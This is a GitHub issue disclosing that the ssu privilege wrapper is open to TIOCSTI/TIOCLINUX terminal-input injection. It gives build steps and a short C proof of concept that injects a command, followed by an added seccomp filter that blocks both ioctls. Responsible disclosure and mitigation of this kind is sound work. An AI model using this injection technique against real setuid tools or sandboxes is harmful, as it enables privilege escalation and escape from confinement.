Open
Description
Hi!
I believe that ssu is vulnerable to privilege escalation using the ioctls TIOCSTI and TIOCLINUX. Here is how to see it in action:
$ cd "$(mktemp -d)"
$ git clone --depth 1 https://github.com/illiliti/ssu
$ cd ssu/
$ git rev-parse HEAD # 606a96b542bb16bd1f4c20058477994f75186fc9
$ make
$ sudo chown root:root ./ssu
$ sudo chmod u+s ./ssu
$ cat <<TIOCSTI_C_EOF | tee TIOCSTI.c
#include <sys/ioctl.h>
int main(void) {
    const char *text = "id\n";
    while (*text)
        ioctl(0, TIOCSTI, text++);
    return 0;
}
TIOCSTI_C_EOF
$ gcc -std=c99 -Wall -Wextra -pedantic -o /tmp/TIOCSTI TIOCSTI.c
$ ./ssu -u nobody /tmp/TIOCSTI # runs id(1) as ${USER} rather than nobody
Please note that:
- This affects both the case where root wants to drop privileges and the case where a non-root user wants to gain other privileges.
- ttyjack allows playing with TIOCSTI and TIOCLINUX comfortably.
- Of the three known options for countermeasures, use of a PTY is currently considered the best solution.
- For a list of other software known to be affected by this issue, please see https://github.com/hartwork/antijack#related-cves-not-mine .
- The code above is inspired by CVE-2017-5226 (bubblewrap escape via TIOCSTI ioctl, containers/bubblewrap#142).
Best, Sebastian
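The seccomp route among the countermeasures mentioned above, as an added example that is not the issue author's or the ssu project's code: a filter that makes the two ioctls fail with EPERM before a privilege-dropping wrapper execs its target. It assumes Linux on a little-endian 64-bit build; the function names are hypothetical.

```c
#include <errno.h>
#include <linux/filter.h>
#include <linux/seccomp.h>
#include <stddef.h>
#include <sys/ioctl.h>
#include <sys/prctl.h>
#include <sys/syscall.h>
#include <unistd.h>

/* Offsets into struct seccomp_data: syscall number and low 32 bits of arg 1
 * (the ioctl request code; assumes a little-endian 64-bit build). */
#define SD_NR   ((unsigned) offsetof(struct seccomp_data, nr))
#define SD_ARG1 ((unsigned) offsetof(struct seccomp_data, args[1]))

/* Install a seccomp-BPF filter under which ioctl(fd, TIOCSTI, ...) and
 * ioctl(fd, TIOCLINUX, ...) fail with EPERM; every other syscall passes.
 * A privilege-dropping wrapper would call this right before execve(). */
int deny_tty_injection_ioctls(void)
{
    struct sock_filter filter[] = {
        BPF_STMT(BPF_LD | BPF_W | BPF_ABS, SD_NR),
        /* not ioctl: jump over the next four instructions to ALLOW */
        BPF_JUMP(BPF_JMP | BPF_JEQ | BPF_K, __NR_ioctl, 0, 4),
        BPF_STMT(BPF_LD | BPF_W | BPF_ABS, SD_ARG1),
        BPF_JUMP(BPF_JMP | BPF_JEQ | BPF_K, TIOCSTI, 1, 0),
        BPF_JUMP(BPF_JMP | BPF_JEQ | BPF_K, TIOCLINUX, 0, 1),
        BPF_STMT(BPF_RET | BPF_K, SECCOMP_RET_ERRNO | (EPERM & SECCOMP_RET_DATA)),
        BPF_STMT(BPF_RET | BPF_K, SECCOMP_RET_ALLOW),
    };
    struct sock_fprog prog = { .len = (unsigned short) (sizeof filter / sizeof filter[0]),
                               .filter = filter };

    /* Required for an unprivileged caller; the bit and the filter both
     * survive execve(), so the target program inherits the restriction. */
    if (prctl(PR_SET_NO_NEW_PRIVS, 1, 0, 0, 0) == -1)
        return -1;
    return prctl(PR_SET_SECCOMP, SECCOMP_MODE_FILTER, &prog);
}

/* Probe that never touches a terminal: fd -1 is invalid, so an unfiltered
 * kernel answers EBADF, while the filter answers EPERM before the fd is
 * even looked up. Returns the errno observed (0 if the call succeeded). */
int probe_tiocsti_errno(void)
{
    char c = 'x';  /* constructed byte; with fd -1 it can never be injected */
    errno = 0;
    return ioctl(-1, TIOCSTI, &c) == -1 ? errno : 0;
}
```

A production filter also compares seccomp_data.arch so that a foreign-ABI syscall cannot bypass the syscall-number check; that is left out here for brevity.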